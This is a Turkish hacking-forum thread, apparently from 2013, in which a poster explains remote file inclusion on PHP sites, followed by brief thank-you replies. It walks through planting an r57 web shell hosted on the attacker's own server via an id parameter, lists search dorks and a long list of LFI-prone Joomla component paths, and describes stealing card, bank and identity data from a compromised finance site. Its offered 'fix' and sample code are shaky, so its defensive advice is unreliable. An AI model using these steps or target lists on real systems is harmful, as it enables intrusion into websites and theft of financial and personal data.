Konuyu Oyla:
  • Toplam: 3 Oy - Ortalama: 4.33
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork )
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 113
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork )
12.12.2013 04:58
Selamın Aleyküm Hayırlı Günler Arkadaşlar RFI açığından bahsedecem.


RFI Nedir?
Nasıl Bulunur?/Nasıl Shell Dahil Edilir/Sokulur?
RFI Açığının Bir Dorku Varmıdır?
LFI BuGs Dork
ve Sonrası...



RFI Açıkları Günümüzde Pek Rastlanmasada Her an Karşımıza Çıkabilecek Bir Saldırı Türüdür.

RFI Açığının Mantığı Uzaktan Dosta Dahil Etmektir.


Günümüzde RFI Açığı Basit Bir Açık Olarak Bilinir.Ama Basit Olduğu Kadar da Çok Tehlikelidir.

Bir Web Sayfası Düşünün ve Bu Web Sayfası PHP Diliyle Kodlanmış Olsun.Eğer Sayfayı Kodlayan Tasarımcı Acemi ise Hata Yapması Kaçınılmazdır.

RFI Nedir?


RFI (Remote File İnclude), Türkçesi Uzaktan Dosya Dahil Etme Anlanmına Gelmektedir.


Nasıl Bulunur?

1-) Hedef Sitenin Scriptini İndirerek RFI Açığı Aranabilir

2-) Hedef Siteyi Scanner ile Tarayarak RFI Açığı Bulunabilir.

2-) Hedef Site Üzerinde Manuel Olarak Aranarak RFI Açığı Bulunabilir.



1-) Hedef Sitenin Scriptinde RFI Açığı Aramak.


İndirdiğiniz Scriptin PHP İle Kodlandığını Varsayalım.RFI Taracağımız Dosyanın adı rfiscript.php olduğunu var sayıyoruz.

Kod:
<?php

include ($degisken. ’../function.php’);

?>
Bu Scriptte RFI Açığı Olduğunu Anlarız.Bu Scripti Bulduğumuz Sitede Açık Tarayabiliriz.Peki bu Açığı Nasıl Kaparız.?

Kod:
<?php

$degisken = ’data’;

include ($degisken. ’../function.php’);

?>

Açığı bu şekilde kapatırız.Ne Yaptık;

Sistemde kullanılmayan bir degisken isimile degişkene deger verdik.Hacker bu sayfada RFI Açığı tarattığında RFI Açığı bulamayacaktır..RFI Açığının bulunmasını engelledik..

2-) Hedef Siteyi Scanner Programları ile Tarayarak RFI Açığı Bulma.

Hedef Sitemizin Adı http://www.xxx.com olsun.Biz bu sitede RFI Açığının olup olmadığını anlamaya çalışacağız.Şimdi bir Web Security Scanner programı ile hedef sitemizi tarayacağız.Ben Örnek olsun diye bir program ismi veriyim.

Acunetix Web Vulnerability Scanner.Türkçesi Acunetix Web Güvenlik Açığı Tarayayıcısı gibi bişey. İngilizcem pek kuvvetli degildir.

Programımızla hedef sitemizi tarattığımızda sitede RFI Açığı olup olmadığınız zaten uyarı olarak size verecektir.Ama ben programla açık taratma taraftarı degilim.Çünkü bu işi siz ögreneceksiniz program degil..

2-)
Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak.

Şimdi size tekrar hedef sitemiz olan http://www.xxx.com üzerinden manuel açık tarayamayı anlatacağım.

Sitemizde bir id değeri ararız.Buldugumuz id değerinde RFI açığı tararız.Nasılmı?

Kod:
www.xxx.com/sayfa.php?id=1

Gerekli olan bir şey daha belirteyim.Kendi hostunuza atılmış bir txt uzantılı shell..Oda http://www.sitemiz.com/r57shell.txt?

Şimdi hedef sitemizdeki id değerinin sonundaki rakam/harf/karakter herneyse siliyoruz ve kendi sitemizdeki txt uzantılı shell adresini yazıyoruz.

Kod:
www.xxx.com/sayfa.php?id=http://sitemiz.com/r57shell.txt?

ekrana r57shellimiz yansır ise bir RFI Açığı bulmuşsunuz demektir.Bir Screnn ile anlatayım bunu; (Shell yansıması)
cyberizm

Evet.Bu şekilde bir Shell yansıması olur ise hedef siteye shell sokulmuş demektir.

RFI Açığının Bir Dorku Varmıdır?

RFI Açığının belirli bir dorku yoktur.PHP ve ASP vs vs sayfalarda olabilir.Şimdi ben buraya binlerce dork yazabilirim ama zamanımız kısıtlı bu yüzden bir kaç örnek dork vereyim.

inurl:"page?id="

inurl:"open?id="

inurl:"go?id="


ve Sonrası...

Evet arkadaşlar.Bakalım neler öğrenmişiz ve daha neler yapabiliriz;

RFI’ın ne olduğunu, Açığı nasıl bulunacağını,Scriptte nasıl tespit edilin nasıl kapatılacağını, bulduğumuz açığı kullanıp nasıl shell sokabileceğimizi ve belli başlı RFI Dorklarını öğrendik.Şimdi gelin bu shell soktuğumuz siteye neler yapılabileceğine bakalım.

Sitemiz bir Finans sitesi olsaydı, Sitedeki Database bilgilerini çeker Tüm KrediKartları, Banka kartları vs bilgileri çekebilirdik.

KrediKartını ve Banka kartını çektiğimiz kişinin msn,facebook,twitter gibi sosyal medya hesaplarına ulabilirdik.Vatandaşlık numarasından tutun sülalesindeki bireylerin bile bilgilerini öğrenebilirdik.Ama yapmadık.Neden?; Bizim kul hakkında gözümüz yok.Sadece yapılabileceğini anlatalım dedik.Bence bir siteye girdiğinizde o siteye index basıp çıkmak yerine hacki daha eğlenceli hale getirebilmelisiniz.



LFI BuGs Dork

Kod:
!lfi submitComment.php?DOCUMENT_ROOT= submitComment.php
!lfi index.php?option=com_beeheard&controller= index.php?option=com_beeheard
!lfi index.php?option=com_arcadegames&controller= option=com_arcadegames
!lfi index.php?option=com_flashgames&controller= "option=com_flashgames"
!lfi /index.php?option=com_addressbook&controller= "option=com_addressbook"
!lfi index.php?option=com_advertising&controller= index.php?option=com_advertising
!lfi /index.php?option=com_cvmaker&controller= /index.php?option=com_cvmaker
!lfi index.php?option=com_myfiles&controller= index.php?option=com_myfiles
!lfi index.php?option=com_onlineexam&controller= "option=com_onlineexam"
!lfi /index.php?option=com_joommail&controller= /index.php?option=com_joommail
!lfi /index.php?option=com_memory&controller= "option=com_memory"
!lfi index.php?option=com_market&controller= "?option=com_market"
!lfi index.php?option=com_diary&controller= index.php?option=com_diary
!lfi /index.php?option=com_worldrates&controller= option=com_worldrates
!lfi index.php?option=com_record&controller= index.php?option=com_record
!lfi index.php?option=com_sweetykeeper&controller= index.php?option=com_sweetykeeper
!lfi index.php?option=com_wgpicasa&controller= index.php?option=com_wgpicasa
!lfi /index.php?option=com_s5clanroster&view= /index.php?option=com_s5clanroster
!lfi index.php?option=com_photobattle&view= index.php?option=com_photobattle
!lfi index.php?option=com_mtfireeagle&controller= index.php?option=com_mtfireeagle
!lfi index.php?option=com_lovefactory&controller= index.php?option=com_lovefactory
!lfi index.php?option=com_jacomment&view= option=com_jacomment
!lfi index.php?option=com_delicious&controller= index.php?option=com_delicious&controller=
!lfi index.php?option=com_blogfactory&controller= index.php?option=com_blogfactory
!lfi index.php?option=com_sebercart&view= index.php?option=com_sebercart
!lfi index.php?option=com_jwhmcs&controller= index.php?option=com_jwhmcs
!lfi index.php?option=com_jukebox&controller= index.php?option=com_jukebox
!lfi index.php?option=com_joomlaflickr&controller= index.php?option=com_joomlaflickr
!lfi index.php?option=com_hsconfig&controller= index.php?option=com_hsconfig
!lfi index.php?option=com_fabrik&controller= index.php?option=com_fabrik
!lfi index.php?option=com_datafeeds&controller= index.php?option=com_datafeeds
!lfi /index.php?option=com_appointment&controller= /index.php?option=com_appointment
!lfi tools.php?p= powered by Plume CMS
!lfi index.php?option=com_awiki&controller= index.php?option=com_awiki
!lfi index.php?option=com_webeecomment&controller= index.php?option=com_webeecomment
!lfi index.php?option=com_realtyna&controller= index.php?option=com_realtyna
!lfi index.php?option=com_powermail&controller= index.php?option=com_powermail
!lfi /index.php?option=com_foobla_suggestions&controller= option=com_foobla_suggestions
!lfi index.php?option=com_pcchess&controller= index.php?option=com_pcchess
!lfi index.php?option=com_tweetla&controller= index.php?option=com_tweetla
!lfi index.php?option=com_ticketbook&controller= index.php?option=com_ticketbook
!lfi index.php?option=com_jfeedback&controller= index.php?option=com_jfeedback
!lfi index.php?option=com_jprojectmanager&controller= index.php?option=com_jprojectmanager
!lfi index.php?option=com_spsnewsletter&controller= index.php?option=com_spsnewsletter
!lfi index.php?option=com_alphauserpoints&view= ndex.php?option=com_alphauserpoints
!lfi index.php?option=com_travelbook&controller= index.php?option=com_travelbook
!lfi index.php?option=com_webtv&controller= index.php?option=com_webtv
!lfi index.php?option=com_horoscope&controller= index.php?option=com_horoscope
!lfi index.php?option=com_rd_download&view=download&cid= index.php?option=com_rd_download
!lfi /modules/pages/index.php?id= pL-PHP
!lfi index.php?option=com_abbrev&controller= index.php?option=com_abbrev
!lfi /index.php?modname= Docebo
!lfi bbcode_inputs.php?layout= bbcode_inputs.php
!lfi /index.php?p= JaxCMS
!lfi index.php?option=com_otzivi&controller= index.php?option=com_otzivi
!lfi /jsloader.php?files[]= jsloader.php
!lfi file.php?file[]= file.php
!lfi vbseo.php?vbseoembedd=1&vbseourl= vbseo.php
!lfi firstvisit.php?lang_global= firstvisit.php
!lfi /modules/hayoo/index.php?theme= TRIBISUR
!lfi index.php?option=com_juliaportfolio&controller= index.php?option=com_juliaportfolio
!lfi index.php?option=com_sbsfile&controller= index.php?option=com_sbsfile
!lfi index.php?option=com_gcalendar&controller= index.php?option=com_gcalendar
!lfi index.php?option=com_ninjarsssyndicator&controller= index.php?option=com_ninjarsssyndicator
!lfi index.php?option=com_rpx&controller= index.php?option=com_rpx
!lfi index.php?option=com_linkr&controller= index.php?option=com_linkr
!lfi index.php?option=com_janews&controller= option=com_janews
!lfi index.php?option=com_ganalytics&controller= index.php?option=com_ganalytics
!lfi index.php?option=com_sectionex&controller= index.php?option=com_sectionex
!lfi index.php?option=com_rokdownloads&controller= option=com_rokdownloads
!lfi index.php?option=com_rwcards&view=rwcards&controller= index.php?option=com_rwcards
!lfi index.php?option=com_news_portal&controller= index.php?option=com_news_portal
!lfi index.php?option=com_jinventory&controller= index.php?option=com_jinventory
!lfi index.php?option=com_wisroyq&controller= index.php?option=com_wisroyq
!lfi /index.php?option=com_redtwitter&view= /index.php?option=com_redtwitter
!lfi index.php?option=com_redshop&view= index.php?option=com_redshop
!lfi upload.php?language= upload.php?language=
!lfi index.php?option=com_weberpcustomer&controller= index.php?option=com_weberpcustomer
!lfi /index.php?option=com_userstatus&controller= option=com_userstatus
!lfi index.php?option=com_jvehicles&controller= index.php?option=com_jvehicles
!lfi index.php?option=com_econtent&controller= index.php?option=com_econtent
!lfi alpha.php?Absolute_Path= alpha.php?Absolute_Path=
!lfi payment.php?page_id= payment.php
!lfi index.php?option=com_dwgraphs&controller= index.php?option=com_dwgraphs
!lfi index.php?w= Pepsi CMS
!lfi index.php?action= index.php?action=
!lfi graph.php?go= "graph.php?go="
!lfi index.php?pg= "index.php?pg="
!lfi index.php?option=com_smestorage&controller= index.php?option=com_smestorage
!lfi index.php?option=com_properties&controller= index.php?option=com_properties
!lfi index.php?option=com_jeformcr&view= index.php?option=com_jeformcr
(Bu konu en son: 27.12.2013 Tarihinde, Saat: 20:48 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


Alinti
LuckMania
*
avatar
Sivile Alındı
Durum: Çevrimdışı
Seviye Puanı: 17
Yaşam Puanı: 88 / 419
Deneyim: 79 / 100
Rep Sayısı: 8
Mesaj Sayısı: 364
Üyelik Tarihi: 11.09.2013
     
Yorum: #2
Cvp: RFI (Tespit Fixleme-Geniş Anlatım)
12.12.2013 12:38
Tebrikler
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı:
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: RFI (Tespit Fixleme-Geniş Anlatım)
12.12.2013 19:29
Teşekkürler Exciting


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,045 / 1,045
Deneyim: 81 / 100
Rep Sayısı: 1002
Mesaj Sayısı: 2958
Üyelik Tarihi: 04.05.2013
      
Yorum: #4
Cvp: RFI (Tespit Fixleme-Geniş Anlatım)
12.12.2013 19:53
Eline sağlık

Dört yanım ihanet, dört yanım yalan. Geçmemiş bu kış, gelmemiş bahar. Şu koca binaları üstüme yıkan gülümser önümde yüzlerce zaaf, umut her şeyden muaf. Dönmedim geri, çıkmıyor üstümden geçmişin kiri..
Alinti
dorukart
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 1
Yaşam Puanı: 0 / 5
Deneyim: 21 / 100
Rep Sayısı: 0
Mesaj Sayısı: 4
Üyelik Tarihi: 06.10.2014
      
Yorum: #5
Cvp: RFI (Tespit Fixleme-Geniş Anlatım LFI BuGs Dork )
07.10.2014 19:36
teşekkürler Exciting
Alinti



1 Ziyaretçi